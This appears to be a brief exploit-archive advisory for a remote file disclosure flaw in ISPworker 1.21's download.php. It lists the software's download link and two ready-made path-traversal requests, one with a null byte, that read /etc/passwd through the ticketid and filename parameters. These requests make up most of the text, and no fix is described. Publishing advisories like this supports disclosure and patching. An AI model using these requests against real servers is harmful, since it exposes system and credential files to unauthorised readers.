ISPworker version 1.21 suffers from a remote file disclosure vulnerability in download.php.
d4cffdfc29150b20d013d7117e1fdd2aISPworker 1.21 Remote File Disclosure Vulnerability
http://ispworker.de/_files/ispworker-1.21.tar.gz
/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
/module/ticket/download.php?filename=../../../../../../../../../etc/passwd
Comments
No comments yet, be the first!